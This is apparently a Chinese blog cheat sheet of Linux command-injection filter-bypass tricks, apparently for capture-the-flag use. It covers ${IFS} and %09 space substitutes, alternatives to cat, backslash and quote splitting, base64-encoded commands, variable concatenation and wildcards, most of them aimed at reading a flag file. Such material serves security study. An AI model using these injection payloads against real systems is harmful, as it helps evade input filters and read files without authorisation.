本文介绍了Linux终端中常用的文本处理命令如cat,tac,more,less等,并探讨了各种安全绕过方法,如空格替换、编码解码、拼接字符串和字符转义等,以提升对命令执行的理解和安全意识。
一、空格代替
<
${IFS}
$IFS$9
%09
二、cat代替
cat:由第一行开始显示内容,并将所有内容输出
tac:从最后一行倒序显示内容,并将所有内容输出
more:根据窗口大小,一页一页的现实文件内容
less:和more类似,但其优点可以往前翻页,而且进行可以搜索字符
head:只显示头几行
tail:只显示最后几行
nl:类似于cat -n,显示时输出行号
tailf:类似于tail -f
sort%20/flag 读文件
三、反斜杠绕过
ca\t fl\ag.txt
四、编码绕过
`echo 'Y2F0Cg==' | base64 -d` flag.txt
五、拼接绕过
b=fl;c=ag;cat $b$c.txt;
cat flag.txt
六、单双引号绕过
c'a't test
c"a"t test
七、通配符绕过
cat t?st
cat te*
cat t[a-z]st
cat t{a,b,c,d,e,f}st
[…]表示匹配方括号之中的任意一个字符
{…}表示匹配大括号里面的所有模式,模式之间使用逗号分隔。
{…}与[…]有一个重要的区别,当匹配的文件不存在,[…]会失去模式的功能,变成一个单纯的字符串,而{…}依然可以展开
扫一扫
1002
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
